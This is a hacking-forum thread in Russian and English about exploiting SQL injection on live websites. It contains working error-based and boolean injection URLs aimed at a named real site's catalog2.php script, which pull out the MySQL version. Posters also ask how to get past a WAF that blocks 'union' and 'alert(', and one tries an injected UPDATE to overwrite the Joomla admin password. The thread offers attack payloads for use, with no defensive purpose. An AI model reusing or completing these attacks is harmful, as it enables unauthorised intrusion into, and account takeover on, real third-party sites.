Я не так далеко лезу. Должно хватать. Не выше корня сайта. Да, это WAF. Проверил, если запрос содержит: Code: union #00 alert( Получаем 403 Forbidden allow_url_include=on по всей видимости, фишка с data не работает. Есть ещё способы?
Guys. I got version working perfectly. Code: http://af-art.be/common/catalog2.php?g_id=3+or+1+group+by+concat_ws%280x7e,version%28%29,floor%28rand%280%29*2%29%29+having+min%280%29+or+1-- I cannot grab tables.
Code: Duplicate entry '3.23.58~1' for key 1 http://af-art.be/common/catalog2.php?g_id=3+and+substring(version(),1,1)like(4) http://af-art.be/common/catalog2.php?g_id=3+and+substring(version(),1,1)like(3) You have 3.23.58 version of MySQL. Information_schema appeared in the 5 version of MySQL
Вопрос чайника: Каким запросом можно обновить данные в ячейке таблицы? Делал так 35+union+select+1,2,3+from+mysql.user+into+update+jos_users+set+password+'test'+where+username+'admin' и так 35+union+select+1,2,3+from+mysql.user+into+update+jos_users+set+password='test'+where+username='admin' никак не получается.
cipa21, You have an error SQL syntax. Please, read manuals 35+union+select+1,2,3+from+mysql.user+into+update+ jos_users+set+password+'test'+where+username+'admin' 1. Синтаксис не правильный. 2. В MYSQL не выполнишь 2 запроса этим ";". 3. С Днем Победы =) Желаю тебе побед!
to cipa21 Вам же MySQL сказал, учите мануалы. UPDATE нельзя выполнить в SELECT запросе! З.Ы. INTO UPDATE - первый раз такое вижу
